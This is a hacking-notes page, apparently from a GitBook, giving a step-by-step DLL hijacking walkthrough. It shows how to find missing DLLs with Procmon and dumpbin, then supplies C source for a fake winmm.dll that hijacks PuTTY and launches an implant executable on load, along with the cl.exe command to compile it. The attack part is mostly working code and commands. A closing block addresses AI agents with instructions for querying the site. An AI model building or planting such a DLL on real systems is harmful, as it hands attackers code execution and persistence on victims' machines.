# DLL Hijacking

#### Procmon:

open procmon (sysinternals) and filter for 'not found'.

once a DLL to inject has been found, identify what we need to implement, run:

```
dumpbin  /imports PATH
```

From the dumpbin check for the DLL you are looking to inject, for this example we will use 'winmm.dll', and hijack PUTTY.exe. google the results and check for information about the libraries e.g PlaySoundA:

```
BOOL PlaySound(
   LPCTSTR pszSound,
   HMODULE hmod,
   DWORD   fdwSound
);
```

Open a debugger to see what the app is doing with the lib injection (in the arch of the exe) and search for the library identified in the DLL. \
Once found, jump through the identified library calls to check what is does. Using the above example, this should show similar:

```
PlaySoundA (dword, dword, dword)
```

then create the following dll (with updated code from your binary):

#### winmm.def:

```csharp
LIBRARY "WinMM"
EXPORTS
  PlaySoundA
```

#### winmm.dll:

```csharp
#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
    STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;

    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
        CreateProcess(
					"c:\\implant\\implant.exe", 
					"", NULL, NULL, TRUE, 0, NULL, NULL, 
					&info, &processInfo);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

extern "C" {
	 __declspec(dllexport) BOOL WINAPI PlaySoundA(
											LPCSTR pszSound,
											HMODULE hmod,
											DWORD fdwSound) {
		 return TRUE;
		}
}
```

and compile using:&#x20;

```batch
@ECHO OFF

cl.exe /W0 /D_USRDLL /D_WINDLL winmm.cpp winmm.def /MT /link /DLL /OUT:winmm.dllb
```

(making sure that you are in the correct ARCH)

Place the DLL into the hijacking pass and should be a hit


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://f1rstbyt3.gitbook.io/hacking-notes/active-directory/privilege-escalation/windows/dll-hijacking.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.